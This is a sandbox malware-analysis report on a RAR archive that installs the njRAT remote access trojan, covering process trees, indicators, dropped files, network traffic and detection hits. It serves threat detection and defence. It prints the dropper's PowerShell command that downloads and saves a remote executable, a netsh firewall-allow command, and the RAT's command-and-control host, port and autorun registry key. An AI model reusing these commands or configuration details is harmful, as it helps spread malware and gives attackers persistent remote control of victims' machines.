File name:

3322.rar

Full analysis: https://app.any.run/tasks/bc7340ed-f206-4de5-bb46-d4570d219d53
Verdict: Malicious activity
Threats:

njRAT is a remote access trojan. It is one of the most widely accessible RATs on the market that features an abundance of educational information. Interested attackers can even find tutorials on YouTube. This allows it to become one of the most popular RATs in the world.

Analysis date: January 08, 2024, 09:44:41
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
rat
njrat
bladabindi
remote
Indicators:
MIME: application/x-rar
File info: RAR archive data, v5
MD5:

9087A30D0935956D470CE46152222B8B

SHA1:

ACCCA8066138E139D44924E441A14384FC0584EB

SHA256:

890CF48B0C2E4DB495DC6224F360510FE5111AA81292DCB3E4F33D121E6C91A5

SSDEEP:

768:oLpH6FWJQ3JHLaQoaMrwDvKHaawrtknNtdi7qvwwalUNFNjqpVIR1H9ZI+xp:oB6FWJCLcFsDvyMKtsawKNkV0ZI+xp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Create files in the Startup directory

      • svchost.exe (PID: 1728)
    • NjRAT is detected

      • svchost.exe (PID: 1728)
    • Changes the autorun value in the registry

      • svchost.exe (PID: 1728)
    • NJRAT has been detected (YARA)

      • svchost.exe (PID: 1728)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • 3322.exe (PID: 1044)
    • Executing commands from a ".bat" file

      • 3322.exe (PID: 1044)
    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 1608)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1608)
    • Reads the Internet Settings

      • powershell.exe (PID: 1588)
      • Server.exe (PID: 1824)
    • Adds/modifies Windows certificates

      • powershell.exe (PID: 1588)
    • The process creates files with name similar to system file names

      • Server.exe (PID: 1824)
      • svchost.exe (PID: 1728)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • svchost.exe (PID: 1728)
  • INFO

    • Checks supported languages

      • 3322.exe (PID: 1044)
      • Server.exe (PID: 1824)
      • svchost.exe (PID: 1728)
    • Create files in a temporary directory

      • 3322.exe (PID: 1044)
    • Drops the executable file immediately after the start

      • WinRAR.exe (PID: 2036)
      • powershell.exe (PID: 1588)
      • Server.exe (PID: 1824)
      • svchost.exe (PID: 1728)
    • Connects to unusual port

      • powershell.exe (PID: 1588)
      • svchost.exe (PID: 1728)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 1588)
    • The Powershell connects to the Internet

      • powershell.exe (PID: 1588)
    • The executable file from the user directory is run by the CMD process

      • Server.exe (PID: 1824)
    • Unusual connection from system programs

      • powershell.exe (PID: 1588)
    • Reads the computer name

      • Server.exe (PID: 1824)
      • svchost.exe (PID: 1728)
    • Reads the machine GUID from the registry

      • Server.exe (PID: 1824)
      • svchost.exe (PID: 1728)
    • Creates files or folders in the user directory

      • svchost.exe (PID: 1728)
    • Reads Environment values

      • svchost.exe (PID: 1728)
    • Starts itself from another location

      • Server.exe (PID: 1824)
    • Connects to the CnC server

      • svchost.exe (PID: 1728)
    • NJRAT has been detected (SURICATA)

      • svchost.exe (PID: 1728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

NjRat

(PID) Process(1728) svchost.exe
C217.ip.gl.ply.gg
Ports58366
BotnetHacKed
Options
Auto-run registry keySoftware\Microsoft\Windows\CurrentVersion\Run\da35bff95a193cef1b562c5b9ba0cf7b
Splitter|'|'|
Versionim523
No Malware configuration.

TRiD

.rar | RAR compressed archive (v5.0) (61.5)
.rar | RAR compressed archive (gen) (38.4)
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs 3322.exe no specs 3322.exe cmd.exe no specs powershell.exe server.exe no specs #NJRAT svchost.exe netsh.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1044"C:\Users\admin\AppData\Local\Temp\Rar$EXa2036.7421\3322.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa2036.7421\3322.exe
WinRAR.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa2036.7421\3322.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
1588powershell -Command "Invoke-WebRequest https://f11.file-upload.download:183/d/r4xn7jdjnlgpv7w75g5imbilzzeccky7r3dwi5hmrpzf6jselhiyjrmwkp7pe7crbqxlbciz/Server.exe -Outfile C:\Users\admin\AppData\Local\Temp\Server.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1608"C:\Windows\system32\cmd" /c "C:\Users\admin\AppData\Local\Temp\A0E.tmp\A0F.tmp\A10.bat C:\Users\admin\AppData\Local\Temp\Rar$EXa2036.7421\3322.exe"C:\Windows\System32\cmd.exe3322.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1728"C:\Users\admin\svchost.exe" C:\Users\admin\svchost.exe
Server.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
NjRat
(PID) Process(1728) svchost.exe
C217.ip.gl.ply.gg
Ports58366
BotnetHacKed
Options
Auto-run registry keySoftware\Microsoft\Windows\CurrentVersion\Run\da35bff95a193cef1b562c5b9ba0cf7b
Splitter|'|'|
Versionim523
1824Server.exe C:\Users\admin\AppData\Local\Temp\Server.execmd.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\server.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
2036"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\3322.rar"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
2204"C:\Users\admin\AppData\Local\Temp\Rar$EXa2036.7421\3322.exe" C:\Users\admin\AppData\Local\Temp\Rar$EXa2036.7421\3322.exeWinRAR.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\appdata\local\temp\rar$exa2036.7421\3322.exe
c:\windows\system32\ntdll.dll
2448netsh firewall add allowedprogram "C:\Users\admin\svchost.exe" "svchost.exe" ENABLEC:\Windows\System32\netsh.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
Total events
6 576
Read events
6 395
Write events
181
Delete events
0

Modification events

(PID) Process:(2036) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2036) WinRAR.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
Executable files
5
Suspicious files
6
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
10443322.exeC:\Users\admin\AppData\Local\Temp\A0E.tmp\A0F.tmp\A10.battext
MD5:C38B8C22152FDF20BAE13B45E1FB428B
SHA256:81E6456CDBFC3933F9E815CE22F73F6F7C6EA6DF14ED8CE5EEAC71B069EC969A
1588powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75Abinary
MD5:ADAB5C4DF031FB9299F71ADA7E18F613
SHA256:7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
1588powershell.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75Abinary
MD5:67F8276BFB0F078C3CC599496B47CD66
SHA256:39961B479F7D55CF891EA0D40CF0100261A1CDB0E94AFC218C75081D65AF73BA
1588powershell.exeC:\Users\admin\AppData\Local\Temp\esqk2wdw.ugv.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1588powershell.exeC:\Users\admin\AppData\Local\Temp\Server.exeexecutable
MD5:73852EB4A95294D3065DCDF9331D0602
SHA256:0273BB215A3D3A9083D00AC6E284AA38AF2315DD034CE61312D1D29D4D684383
2036WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$EXa2036.7421\3322.exeexecutable
MD5:A9E679637A03CE6F370936E680FCCD60
SHA256:42E9C480503E70882D15EF96B4BFEEA318405CBFBA55FC31273D0D8CDEA6522D
1728svchost.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\da35bff95a193cef1b562c5b9ba0cf7b.exeexecutable
MD5:73852EB4A95294D3065DCDF9331D0602
SHA256:0273BB215A3D3A9083D00AC6E284AA38AF2315DD034CE61312D1D29D4D684383
1588powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
1824Server.exeC:\Users\admin\svchost.exeexecutable
MD5:73852EB4A95294D3065DCDF9331D0602
SHA256:0273BB215A3D3A9083D00AC6E284AA38AF2315DD034CE61312D1D29D4D684383
1728svchost.exeC:\svchost.exeexecutable
MD5:73852EB4A95294D3065DCDF9331D0602
SHA256:0273BB215A3D3A9083D00AC6E284AA38AF2315DD034CE61312D1D29D4D684383
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
9
DNS requests
3
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1588
powershell.exe
GET
200
172.64.149.23:80
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
unknown
binary
1.52 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1080
svchost.exe
224.0.0.252:5355
unknown
1588
powershell.exe
51.38.57.48:183
f11.file-upload.download
OVH SAS
FR
unknown
1588
powershell.exe
172.64.149.23:80
crt.sectigo.com
CLOUDFLARENET
US
unknown
1728
svchost.exe
147.185.221.17:58366
17.ip.gl.ply.gg
PLAYIT-GG
US
malicious

DNS requests

Domain
IP
Reputation
f11.file-upload.download
  • 51.38.57.48
unknown
crt.sectigo.com
  • 172.64.149.23
  • 104.18.38.233
whitelisted
17.ip.gl.ply.gg
  • 147.185.221.17
malicious

Threats

PID
Process
Class
Message
1728
svchost.exe
Malware Command and Control Activity Detected
ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
1728
svchost.exe
Malware Command and Control Activity Detected
ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll)
1728
svchost.exe
Malware Command and Control Activity Detected
ET MALWARE njrat ver 0.7d Malware CnC Callback (Remote Desktop)
4 ETPRO signatures available at the full report
No debug info